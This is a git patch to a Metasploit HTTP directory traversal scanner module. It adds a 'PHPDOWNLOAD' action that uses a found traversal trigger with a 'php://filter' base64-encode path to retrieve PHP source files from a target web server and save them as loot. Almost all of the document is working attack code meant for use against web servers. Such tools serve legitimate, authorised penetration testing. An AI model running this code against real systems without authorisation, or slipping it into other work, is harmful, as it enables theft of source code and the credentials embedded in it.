From cad590488d1fae5ec0e7a8ad7af545d0be4a64d6 Mon Sep 17 00:00:00 2001 From: "Ewerson Guimaraes (Crash)" Date: Fri, 24 Aug 2012 15:47:07 -0300 Subject: [PATCH] Update modules/auxiliary/scanner/http/http_traversal.rb --- .../auxiliary/scanner/http/http_traversal.rb | 47 +++++++++++++++++-- 1 file changed, 44 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index 071b726463..49d0938340 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -12,6 +12,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery + def initialize(info = {}) super(update_info(info, 'Name' => 'Generic HTTP Directory Traversal Utility', @@ -23,7 +24,9 @@ class Metasploit3 < Msf::Auxiliary directory traversal exists in the web server, and then return the path that triggers the vulnerability. The 'DOWNLOAD' action shares the same ability as 'CHECK', but will take advantage of the found trigger to download files based on - a 'FILELIST' of your choosing. The 'WRITABLE' action can be used to determine + a 'FILELIST' of your choosing. You also can to download php source code files using PHPDOWNLOAD + based in a crawled list. + The 'WRITABLE' action can be used to determine if the trigger can be used to write files outside the www directory. To use the 'COOKIE' option, set your value like so: "name=value". To use @@ -41,7 +44,8 @@ class Metasploit3 < Msf::Auxiliary [ ['CHECK', {'Description' => 'Check for basic directory traversal'}], ['WRITABLE', {'Description' => 'Check if a traversal bug allows us to write anywhere'}], - ['DOWNLOAD', {'Description' => 'Attempt to download files after bruteforcing a trigger'}] + ['DOWNLOAD', {'Description' => 'Attempt to download files after bruteforcing a trigger'}], + ['PHPDOWNLOAD', {'Description' => 'Attempt to download php source code files'}] ], 'DefaultAction' => 'CHECK' )) @@ -245,6 +249,35 @@ class Metasploit3 < Msf::Auxiliary print_status("#{counter.to_s} file(s) downloaded") end + + # + # Action 'PHPDOWNLOAD': Used to grab the php source code + # + def php_download(files) + counter = 0 + files.each_line do |f| + # Our trigger already puts us in '/', so our filename doesn't need to begin with that + f = f[1,f.length] if f =~ /^\// + + req = ini_request(uri = (datastore['PATH'] + "php://filter/read=convert.base64-encode/resource=" + f).chop) + res = send_request_cgi(req, 25) + + vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") + + # Only download files that are withint our interest + #if res and res.to_s =~ datastore['PATTERN'] + # We assume the string followed by the last '/' is our file name + fname = f.split("/")[-1].chop + loot = store_loot("php.data","text/plain",rhost,Rex::Text.decode_base64(res.body),fname) + print_good("File #{fname} downloaded to: #{loot}") + counter += 1 + #end + end + print_status("#{counter.to_s} source code file(s) downloaded") + end + + + # # Action 'WRITABLE': This method will attempt to write to a directory outside of www # @@ -321,10 +354,18 @@ class Metasploit3 < Msf::Auxiliary return if trigger.nil? is_writable(trigger) + elsif action.name == 'PHPDOWNLOAD' + trigger = ini_trigger + return if trigger.nil? + files = load_filelist + php_download(files) + + elsif action.name == 'DOWNLOAD' trigger = ini_trigger return if trigger.nil? - + + # Load up a file list that we wish to download, and then attempt to download them # with our directory traversal trigger files = load_filelist